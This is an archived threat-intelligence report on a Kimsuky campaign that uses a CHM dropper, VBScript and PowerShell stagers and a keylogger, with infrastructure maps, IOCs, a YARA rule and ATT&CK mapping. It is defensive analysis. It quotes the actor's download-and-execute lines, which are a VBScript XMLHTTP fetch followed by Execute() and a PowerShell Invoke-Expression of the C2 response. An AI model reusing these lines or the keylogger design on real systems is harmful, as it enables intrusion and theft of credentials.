{
	"id": "dd9622f1-71d9-49ef-8bd7-3b19ce311dd1",
	"created_at": "2026-05-06T02:02:57.208032Z",
	"updated_at": "2026-05-06T02:03:52.698639Z",
	"deleted_at": null,
	"sha1_hash": "02e61990f3e053afd9e6aaa3b1a6fd466e46fbd3",
	"title": "We Dumped a Live Kimsuky C2 and Recovered Every Stage of the Kill Chain: CHM Dropper, VBScript Stager, PowerSh",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 172506,
	"plain_text": "We Dumped a Live Kimsuky C2 and Recovered Every Stage of the\r\nKill Chain: CHM Dropper, VBScript Stager, PowerSh\r\nBy Breakglass Intelligence\r\nPublished: 2026-04-11 · Archived: 2026-05-06 02:01:30 UTC\r\nTable of Contents\r\n#TL;DR\r\n#What this report adds to the public record\r\n#The Kill Chain\r\n#The C2 Server — Directory Listing Enabled\r\n#Stage 1: Reconnaissance + Persistence (6,338 bytes VBScript)\r\n#Stage 2: PowerShell Bridge (449 bytes VBScript)\r\n#Stage 3: Full Keylogger (6,234 bytes PowerShell)\r\n#Infrastructure: 79 Domains Across 5 IPs\r\n##The DAOU Staging Server (27.102.137.38 — 37 domains)\r\n##The Fast-Flux Farm (118.194.249.109 — 40 domains)\r\n##The Naver Phishing Farm (27.102.137.150 — 12+ domains, LIVE)\r\n#Related Kimsuky Sample\r\n#Detection Guidance\r\n##Network Signatures\r\n##Host Indicators\r\n##YARA\r\n#IOC Summary\r\n##File Hashes\r\n##Network IOCs\r\n##Host IOCs\r\n#MITRE ATT\u0026CK\r\n#Attribution\r\n#Methodology Disclaimer\r\nTL;DR\r\nOn April 11, 2026, researcher @smica83 submitted a CHM file ( api_reference.chm ) to MalwareBazaar tagged\r\n#Kimsuky . We picked it up and walked the infrastructure. The C2 server at check[.]nid-log[.]com had\r\ndirectory listing enabled and was serving payloads to anyone who asked. 
We recovered the complete source code\r\nof all three attack stages before the actor can rotate:\r\nStage 1 (6,338 bytes VBScript): Full system reconnaissance — OS, CPU, RAM, processes, AV products,\r\ndirectory listings of Desktop/Documents/Downloads — plus persistence via a scheduled task disguised as\r\nhttps://intel.breakglass.tech/post/kimsuky-chm-nidlog-c2-dump-full-payload-recovery\r\nPage 1 of 11\n\n\"Edge Updater\"\r\nStage 2 (449 bytes VBScript → PowerShell): Bridge script that downloads and Invoke-Expression s the\r\nkeylogger\r\nStage 3 (6,234 bytes PowerShell): Complete keylogger with keystroke capture, clipboard monitoring,\r\nwindow tracking, and timed exfiltration using deliberately typo'd User-Agents ( Chremo instead of\r\nChrome, Edgo instead of Edge)\r\nThe C2 health check at /pc/index.php returns \"Million OK !!!!\" — the same signature Hunt.io documented on\r\nolder Kimsuky infrastructure in December 2024, except the actor has since upgraded from Apache 2.4.25\r\n(Win32) PHP 5.6.30 to Apache 2.4.58 (Win64) PHP 8.2.12. We found the old-generation server still alive on a\r\nseparate IP, both responding with \"Million OK !!!!\" — confirming infrastructure continuity.\r\nWe then mapped 79+ domains across 5 C2 IPs spanning Korean VPS resellers (DAOU Technology, UCloud HK,\r\nKaopu Cloud) and traced the infrastructure back to our previously published Kimsuky investigation — the C2\r\nstaging server at 27.102.137.38 sits in the same /16 subnet as 27.102.138.45 (the uncork[.]biz phishing\r\nnode from the udalyonka cluster), linking these two campaigns to the same operational cell.\r\nWhat this report adds to the public record\r\nAhnLab ASEC documented Kimsuky's shift from list.php to bootservice.php endpoints in April 2024, but\r\npublished only the endpoint names — not the actual payload source code. 
Hunt.io documented the \"Million OK\r\n!!!!\" health check and server fingerprint in December 2024, but on infrastructure that has since been upgraded.\r\nWhat our investigation adds:\r\n1. First public recovery of the complete payload source code for all three stages of the bootservice.php\r\nkill chain — recon, persistence, and keylogger\r\n2. Two previously undocumented C2 endpoints: checkservice.php (PowerShell stager delivery) and\r\nfinalservice.php (exfiltration receiver accepting multipart file uploads)\r\n3. Novel detection IOCs: Global\\AlreadyRunning19122345 mutex, Chremo / Edgo typo'd User-Agents,\r\nEdge Updater scheduled task, ----c2xkanZvaXU4OTA multipart boundary\r\n4. 79-domain infrastructure map — the most comprehensive public mapping of this Kimsuky DDNS\r\nphishing farm, including Korean NTS tax impersonation domains and Naver NID credential harvesting at\r\nscale\r\n5. Cross-campaign link connecting this CHM/bootservice cluster to our previously reported\r\nudalyonka/uncork.biz phishing operation via shared DAOU Technology subnet\r\n6. Server generation tracking — documenting the actor's upgrade from Win32/PHP 5.6 to Win64/PHP 8.2\r\nwhile preserving the \"Million OK !!!!\" beacon signature\r\nIf you've already published reporting on nid-log[.]com , the 130.94.29.111 cluster, or the bootservice.php\r\npayload source, please reply or DM — we'll update and credit.\r\nThe Kill Chain\r\nOn April 10, 2026, api_reference.chm (MD5: 0ac44ad9cfbc58ed76415f7bc79239f9 ) was submitted to\r\nMalwareBazaar by @smica83 (h/t @h2jazi for the original lead), tagged apt , chm , Kimsuky . Avast and AVG\r\nimmediately flagged it as VBS:Kimsuky-AH [Trj] . VirusTotal classified the campaign as downloader.kimsuky .\r\nThe CHM file disguises itself as API documentation. 
When a victim opens it, hh.exe renders the compiled\r\nHTML — which contains a hidden object that fires on click, triggering a three-stage LOLBin chain:\r\nhh.exe (opens CHM)\r\n └─\u003e powershell.exe -windowstyle hidden\r\n │ Writes base64 blob to %USERPROFILE%\\Links\\Link.dat\r\n └─\u003e certutil.exe -f -decode Link.dat Link.ini\r\n └─\u003e wscript.exe //b //e:vbscript Link.ini\r\n └─\u003e HTTP GET → check.nid-log[.]com/api/bootservice.php?tag=\u003crandom\u003e\u0026query=1\r\n └─\u003e Execute(responseText) ← fileless RCE\r\nThe tag parameter is a random 4-digit number (1–10000) for victim tracking. The query parameter selects\r\nwhich payload the server returns. The VBScript uses string concatenation obfuscation to evade static analysis:\r\nSet mx = CreateObject(\"Microsof\"\u0026\"t.XML\"\u0026\"HT\"\u0026\"TP\")\r\nmx.open \"GE\"\u0026\"T\", \"http://check.nid-log[.]com/api/bootservice.php?\"+\"tag=\"+rnd_num+\"\u0026query=1\", False\r\nmx.Send\r\nExecute(mx.responseText)\r\nNo file touches disk for the second-stage payload — it's fetched over HTTP and executed directly in memory via\r\nVBScript's Execute() .\r\nThe C2 Server — Directory Listing Enabled\r\nThe C2 at 130[.]94[.]29[.]111 runs Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 — a Windows box\r\nwith what appears to be a XAMPP-style deployment. Two ports are open: 80 (HTTP) and 3389 (RDP).\r\nThe actor left directory listing enabled at the web root:\r\nIndex of /\r\n /api/ 2023-11-15\r\n /pc/ 2023-11-15\r\nThe health check endpoint /pc/index.php returns:\r\nMillion OK !!!!\r\nThis is the same signature Hunt.io documented in December 2024 across a cluster of Kimsuky C2 servers. Their\r\ndocumented fingerprint was Apache/2.4.25 (Win32) PHP/5.6.30 on UCloud HK infrastructure. Ours is\r\nApache/2.4.58 (Win64) PHP/8.2.12 on LightNode (AS154177). 
Same operator, upgraded stack.\r\nWe confirmed this by finding the old-generation server still alive at 51[.]79[.]185[.]184 (OVH Canada), also\r\nreturning \"Million OK !!!!\" with the exact Apache/2.4.25 (Win32) PHP/5.6.30 fingerprint Hunt.io documented.\r\nBoth generations running simultaneously.\r\nOther interesting paths that returned 403 (present but access-restricted): /server-status , /server-info ,\r\n/.htaccess , /phpmyadmin/ .\r\nStage 1: Reconnaissance + Persistence (6,338 bytes VBScript)\r\nEndpoint: GET /api/bootservice.php?tag=\u003cID\u003e\u0026query=1\r\nThe server returns 6,338 bytes of VBScript that performs comprehensive system profiling:\r\nReconnaissance collected:\r\nComputer name, registered owner, manufacturer, model\r\nOS version and build number\r\nTotal physical memory, processor speed\r\nDirectory listings of: Desktop, Documents, Favorites, Recent, Startup, Program Files, Downloads\r\nFull process table: filename, ProcessID, SessionID (via Win32_Process )\r\nInstalled antivirus: display name, path, GUID, state (via SecurityCenter2\\AntiVirusProduct )\r\nPersistence planted:\r\nCreates a scheduled task named \"Edge Updater\" with a 60-minute interval ( PT60M )\r\nThe task executes wscript.exe //b //e:vbscript against a dropped .ini file\r\nThe .ini is placed in Shell.Application.NameSpace(32) (System folder) named\r\nOfficeUpdater_\u003cminute\u003e_\u003chour\u003e_\u003cday\u003e\u003cmonth\u003e.ini\r\nThe .ini file is a one-liner that fetches and Execute() s bootservice.php?query=6\r\nIE/Edge first-run customization is disabled to prevent popups\r\nExfiltration:\r\nAll recon data is Base64-encoded and POSTed as a multipart form to /api/finalservice.php\r\nMultipart boundary: ----c2xkanZvaXU4OTA\r\nUpload filename: Info.txt\r\nStage 2: PowerShell Bridge (449 bytes VBScript)\r\nEndpoint: GET /api/bootservice.php?tag=\u003cID\u003e\u0026query=6\r\nA lightweight 449-byte VBScript that bridges to 
PowerShell:\r\npowershell -command \"$base_url='http://check.nid-log[.]com/api';\r\n$rnd_num=[string](Get-Random -Minimum 1 -Maximum 10000);\r\n$url=$base_url+'/checkservice.php?idx=5\u0026tag='+$rnd_num;\r\nInvoke-Expression (Invoke-RestMethod $url);\r\nLogAction -ur $base_url\"\r\nThe LogAction function is defined in the code returned by checkservice.php — likely the exfiltration routine.\r\nStage 3: Full Keylogger (6,234 bytes PowerShell)\r\nEndpoint: GET /api/checkservice.php?idx=5\u0026tag=\u003cID\u003e\r\nThis is a complete keylogger with clipboard monitoring and timed exfiltration. Key capabilities:\r\nFeature Implementation\r\nKeystroke capture Win32 API: GetAsyncKeyState , GetKeyboardState , MapVirtualKey , ToUnicode\r\nWindow tracking Logs active window title changes with timestamps\r\nClipboard monitoring Polls clipboard every 1 second for changes\r\nDuplicate prevention Mutex: Global\\AlreadyRunning19122345\r\nLog storage %APPDATA%\\Microsoft\\Windows\\Templates\\Office_Config.xml\r\nExfil interval Randomized 100–140 minutes\r\nExfil method Base64 → multipart POST to /api/finalservice.php , filename key\r\nUser-Agent (recon) Chremo/87.0.4280.141 — deliberate \"Chrome\" typo\r\nUser-Agent (keylog) Edgo/87.0.664.75 — deliberate \"Edge\" typo\r\nObfuscation API function names split into arrays and reassembled at runtime\r\nThe deliberate User-Agent typos ( Chremo , Edgo ) are a reliable detection signature — they won't match\r\nlegitimate browser traffic but avoid simple keyword blocking of \"Chrome\" or \"Edge\".\r\nInfrastructure: 79 Domains Across 5 IPs\r\nThe domain nid-log[.]com was registered on February 26, 2026 via Namecheap with Iceland privacy proxy\r\n(withheldforprivacy.com). A ZeroSSL certificate was issued the same day. 
Google MX and Site Verification were\r\nconfigured — likely for credential exfiltration via Google services.\r\nThe domain rotated through 5 IPs in 9 days:\r\nDate IP Provider Country Domains Status\r\nFeb 26 162.255.119.150 Namecheap parking US 2 Redirect\r\nFeb 26 38.60.220.135 Kaopu Cloud HK KR 2 Dead\r\nFeb 26 118.194.249.109 UCloud HK KR 40 Proxy up, backend dead\r\nMar 2 27.102.137.38 DAOU Technology KR 37 cPanel, C2 removed\r\nMar 7 130.94.29.111 LightNode Ltd US 2 LIVE — current C2\r\nThe pattern is clear: rotate to a new Korean VPS when detection scores climb, then move to a US-based provider\r\n(LightNode) to blend with Western traffic.\r\nThe DAOU Staging Server (27.102.137.38 — 37 domains)\r\nThis IP hosted the richest domain set, revealing the full campaign playbook:\r\nKorean NTS tax phishing: nid-tax[.]dns.army , tax-invoice[.]dns.army , pay-tax[.]dns.navy , ntax-doc[.]v6.rocks , miss-tax[.]dns.navy , k-invoice[.]v6.navy , and more\r\nNaver NID credential theft: nid-log[.]com , nid-log.electric-support[.]v6.rocks , nid-htl[.]duckdns.org , verify.efine-log[.]kro.kr\r\nDocument delivery lures: deliver-doc[.]v6.navy\r\nThis server sits at 27.102.137.38 — in the same DAOU Technology AS45996 allocation as 27.102.138.45 ,\r\nthe chk.uncork[.]biz phishing node from our previously published investigation of the udalyonka[.]com\r\nKimsuky phishing cluster. 
Same provider, same /16, same operational cell.\r\nThe Fast-Flux Farm (118.194.249.109 — 40 domains)\r\nForty domains with randomized 5-character subdomain prefixes across dns.army , dns.navy , and v6.navy —\r\na fast-flux C2 rotation pattern using 7 free DDNS providers: dynv6.net, dns.army, dns.navy, v6.rocks, v6.navy,\r\nduckdns.org, and kro.kr.\r\nThe Naver Phishing Farm (27.102.137.150 — 12+ domains, LIVE)\r\nA separate IP hosting mass-generated Naver credential phishing pages using No-IP DDNS with a\r\nnid-naver{3-letter-code} naming convention:\r\nnid-navertca.servehalflife[.]com (Apr 7)\r\nnid-naverfxc.servecounterstrike[.]com (Apr 4)\r\nnid-naverpep.servequake[.]com (Apr 1)\r\nnid-navercwu.servecounterstrike[.]com (Mar 20)\r\nAnd 8+ more dating back to March 2\r\nThis server runs the same Apache/2.4.58 (Win64) PHP/8.0.30 stack and implements an anti-bot JavaScript\r\nfilter — it sets a jsok=1 cookie and reloads, then checks additional conditions (likely geo-IP) before serving the\r\nphishing page. Only Korean visitors see the lure.\r\nRelated Kimsuky Sample\r\nThe MD5 4599ac1bbe483c73064df1353feafd01 referenced in AhnLab ASEC's April 2024 report is a CHM file\r\nnamed SecurityMail.chm with an identical kill chain — hh.exe → hidden PowerShell → certutil decode\r\n→ wscript Link.ini → Execute() . The same YARA rule ( CHM_File_Executes_JS_Via_PowerShell ) fires\r\non both samples. The difference: the older sample calls noreplymail[.]space/BitJoker/bootservice.php\r\ninstead of check.nid-log[.]com/api/bootservice.php . Same tooling, different C2. 
The sandbox also detected\r\nKorean locale geofencing ( ko-KR ) — the CHM checks the victim's language before proceeding.\r\nDetection Guidance\r\nNetwork Signatures\r\nHTTP requests to */bootservice.php?tag=*\u0026query=*\r\nHTTP requests to */checkservice.php?idx=*\r\nHTTP requests to */finalservice.php with multipart boundary ----c2xkanZvaXU4OTA\r\nHTTP responses containing Million OK !!!!\r\nUser-Agent strings containing Chremo/ or Edgo/\r\nHost Indicators\r\nScheduled task named Edge Updater with 60-minute interval\r\nFiles matching OfficeUpdater_*_*_*.ini in system directories\r\nMutex Global\\AlreadyRunning19122345\r\nFile creation at %APPDATA%\\Microsoft\\Windows\\Templates\\Office_Config.xml\r\nhh.exe spawning powershell.exe -windowstyle hidden followed by certutil.exe then\r\nwscript.exe\r\nYARA\r\nrule Kimsuky_Bootservice_CHM_Dropper {\r\n meta:\r\n description = \"Kimsuky CHM dropper delivering VBS stager via bootservice.php C2\"\r\n author = \"GHOST - Breakglass Intelligence\"\r\n date = \"2026-04-11\"\r\n reference = \"https://intel.breakglass.tech\"\r\n strings:\r\n $c2_1 = \"bootservice.php\" ascii wide\r\n $c2_2 = \"checkservice.php\" ascii wide\r\n $c2_3 = \"finalservice.php\" ascii wide\r\n $c2_4 = \"loggerservice.php\" ascii wide\r\n $drop = \"Links\\\\Link\" ascii wide\r\n $ole = \"Microsoft.XMLHTTP\" ascii wide\r\n $persist = \"OfficeUpdater\" ascii wide\r\n $mutex = \"AlreadyRunning19122345\" ascii wide\r\n $ua_1 = \"Chremo/\" ascii wide\r\n $ua_2 = \"Edgo/\" ascii wide\r\n condition:\r\n any of ($c2_*) and any of ($drop, $ole, $persist, $mutex, $ua_*)\r\n}\r\nIOC Summary\r\nFile Hashes\r\nHash File Detection\r\n1eff237dee95172363bfc0342d0389f809f753a6ec5e6848e57b3fd5482e9793 api_reference.chm 10/76\r\n85f8f8a3f28d2956776fbbd0365cdb78ac8dc1e6ed12818ef18caed0bb2f74c8 Link.ini 
7/69\r\naf50f35701916d3909f2727cdcbde1a7af47f46eb8db3996905b1c0725aa133f payload_1.vbs (recon) 8/76\r\nd7c09e7bf79aa9b786dcd9f870427f4a1110f702646fba9d3835215ad3649d0b payload_1.vbs (PS stager) 3/76\r\na36576a096db24a1c91327eb547dedf52e5bd4b0d4593b88d9593d377585b922 bootservice.php response 0/62\r\nNetwork IOCs\r\nType Value Context\r\nDomain nid-log[.]com C2 apex\r\nDomain check[.]nid-log[.]com Active C2 subdomain\r\nIP 130[.]94[.]29[.]111 Current C2 (LightNode)\r\nIP 27[.]102[.]137[.]38 Staging server (DAOU, 37 domains)\r\nIP 118[.]194[.]249[.]109 Fast-flux farm (UCloud HK, 40 domains)\r\nIP 27[.]102[.]137[.]150 Live Naver phishing farm\r\nIP 51[.]79[.]185[.]184 Old-gen C2, \"Million OK !!!!\"\r\nURL http://check[.]nid-log[.]com/api/bootservice.php Payload delivery\r\nURL http://check[.]nid-log[.]com/api/checkservice.php Keylogger delivery\r\nURL http://check[.]nid-log[.]com/api/finalservice.php Exfil receiver\r\nHost IOCs\r\nType Value\r\nScheduled Task Edge Updater (PT60M)\r\nMutex Global\\AlreadyRunning19122345\r\nFile %USERPROFILE%\\Links\\Link.ini\r\nFile %APPDATA%\\...\\Templates\\Office_Config.xml\r\nFile OfficeUpdater_*_*_*.ini\r\nUser-Agent Chremo/87.0.4280.141\r\nUser-Agent Edgo/87.0.664.75\r\nMultipart Boundary ----c2xkanZvaXU4OTA\r\nMITRE ATT\u0026CK\r\nID Technique Evidence\r\nT1566.001 Phishing: Spearphishing Attachment CHM file delivered to target\r\nT1204.002 User Execution: Malicious File Victim opens api_reference.chm\r\nT1059.005 Command and Scripting: VBScript Link.ini, OfficeUpdater.ini\r\nT1059.001 Command and Scripting: PowerShell checkservice.php keylogger\r\nT1140 Deobfuscate/Decode Files certutil -f -decode\r\nT1053 Scheduled Task \"Edge Updater\" (60-min)\r\nT1036.005 Masquerading Task named after Edge browser\r\nT1082 System Information Discovery OS, CPU, RAM, manufacturer\r\nT1057 Process Discovery Full Win32_Process dump\r\nT1518.001 Security Software Discovery AV product enumeration\r\nT1083 File and Directory Discovery Desktop, Documents, Downloads\r\nT1056.001 Input Capture: Keylogging GetAsyncKeyState keylogger\r\nT1115 Clipboard Data Clipboard polling every 1s\r\nT1071.001 Web Protocols (HTTP) bootservice/checkservice/finalservice\r\nT1132.001 Data Encoding: Base64 Payload and exfil encoding\r\nT1041 Exfiltration Over C2 Multipart POST to finalservice.php\r\nAttribution\r\nKimsuky (APT43 / Velvet Chollima / Black Banshee) — DPRK — HIGH confidence\r\nAvast/AVG signature: VBS:Kimsuky-AH [Trj]\r\nVirusTotal classification: downloader.kimsuky\r\nThreatFox: nid-log[.]com tagged win.kimsuky (confidence 75, reporter Lenny_3BO)\r\nAhnLab ASEC: identical kill chain documented in April 2024 report\r\nTarget: South Korean Naver users (domain mimics nid.naver.com )\r\nXAMPP-on-Windows deployment preference matches documented Kimsuky operational patterns\r\nDAOU Technology hosting overlap with our previously published Kimsuky phishing investigation\r\nMethodology Disclaimer\r\nThis investigation employed passive intelligence collection (VirusTotal, crt.sh, WHOIS, DNS, certificate\r\ntransparency, Shodan InternetDB, URLScan, ThreatFox, MalwareBazaar) and active inspection of services\r\npublicly accessible without authentication. Where the C2 server returned payload content in response to HTTP\r\nGET requests without any authentication, that content was collected and analyzed. No destructive actions were\r\ntaken. No customer data was exfiltrated. No services were disrupted.\r\nGHOST — Breakglass Intelligence \"One indicator. 
Total infrastructure.\"\r\nSource: https://intel.breakglass.tech/post/kimsuky-chm-nidlog-c2-dump-full-payload-recovery",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://intel.breakglass.tech/post/kimsuky-chm-nidlog-c2-dump-full-payload-recovery"
	],
	"report_names": [
		"kimsuky-chm-nidlog-c2-dump-full-payload-recovery"
	],
	"threat_actors": [],
	"ts_created_at": 1778032977,
	"ts_updated_at": 1778033032,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/02e61990f3e053afd9e6aaa3b1a6fd466e46fbd3.pdf",
		"text": "https://archive.orkl.eu/02e61990f3e053afd9e6aaa3b1a6fd466e46fbd3.txt",
		"img": "https://archive.orkl.eu/02e61990f3e053afd9e6aaa3b1a6fd466e46fbd3.jpg"
	}
}